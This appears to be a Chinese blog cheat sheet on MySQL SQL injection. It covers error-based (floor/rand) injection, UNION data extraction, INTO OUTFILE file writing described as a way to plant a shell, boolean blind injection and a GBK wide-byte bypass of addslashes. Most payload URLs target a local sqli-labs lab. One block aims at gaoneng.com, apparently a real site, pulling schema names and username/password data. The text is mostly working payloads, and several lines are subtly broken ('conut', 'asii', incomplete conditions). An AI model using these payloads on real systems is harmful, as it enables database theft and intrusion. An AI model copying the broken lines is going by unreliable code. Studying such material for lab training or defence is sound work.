条件
用户可以接触并修改发送到服务器的内容
URL判断
and 1=1 and 1=2 依据返回信息判断 整形
’ 同上 字符型判断
-1 / +1 回显上个页面 整形
and sleep(12) 返回时间
原理
类型与手法
判断方法
以下均为完美条件下。。。
报错 floor
floor方法
mysql> select concat(select database());
mysql> select concat(select database(),0x3a);
mysql> select concat(select database(),0x3a,floor(rand()*2));
mysql> select concat(select database(),0x3a,floor(rand()*2)) a;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
mysql> select conut(*),concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry ‘:security:1’ for key ‘group_key’
依据语句返回错误判断数据库、用户、版本、主机类型等信息
获取数据库个数:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
数据库:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat(0x3a,(select database()),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
查表:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
字段:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select column_name from information_schema.columns where table_name=’users’ limit 2,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
数据:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select concat_ws(0x3a,username,password) from users limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +
ps:修改limit的值可实现查询不同用户或表名等 在MySQL 5.x版本
可采用文件导出方式(当前MySQL用户拥有文件操作权限)
数据库:
http://127.0.0.1/ctf/sqli-labs/Less-7/index.php
?id=1’)) UNION SELECT 1,database(),3 into outfile “D:/Wamp/www/ctf/sqli-labs/Less-7/tests.txt” –+
也是写入shell的方式,导出文件不支持覆盖 可将查询一次性导出
盲注 适合MySQL 5.x以下及一些禁报错的语句
判断版本:
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and substr(version(),1,1)=5–+ #返回正常则为MySQL 5.x
数据库:
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (length(database()))=8–+ #测试数据库长度
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))>110–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))<116–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))=115–+ #第一个字母为s
依据页面显示依次判断数据库名组成
表名:
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)> from information_schema.tables where table_schema=database() limit 0,1) –+ #true
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)>7 from information_schema.tables where table_schema=database() limit 0,1) –+ #false
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)=6 from information_schema.tables where table_schema=database() limit 0,1) –+ #true 第一个表长度为6
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and asii(select table_name from information_schema.tables where table_schema=database() limit 0,1)=65 –+ # ascii(e)=65
修改limit值依次测试表名
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(column_name)>4 from information_schema.columns where table_name limit 0,1) –+
重复操作字段猜测
以上操作只适合MySQL 5.x及一些information_schema库拥有可查看权限
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (length(database()))=8–+ #测试数据库长度
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))>110–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),2,1))<116–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),3,1))=115–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and exists(select * from users) –+ #依页面返回值及常用表名判断是否存在
基于是盲注sleep方法
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(schema_name)from information_schema.schemata),…,x 爆数据库
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(table_name)from information_schema.tables where schema_name=’数据库名字’),…,x 爆表
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=’表名’),…,x 爆字段
http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(user,pass)from 表名 ),…,x 报数据
宽字节注入
条件 gbk编码
sql注入中的宽字节国内最常使用的gbk编码,这种方式主要是绕过addslashes等对特殊字符进行转移的绕过。反斜杠\的十六进制为%5c,在你输入%bf%27时,函数遇到单引号自动转移加入\,此时变为%bf%5c%27,%bf%5c在gbk中变为一个宽字符“縗”。%bf那个位置可以是%81-%fe中间的任何字符。
4352
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
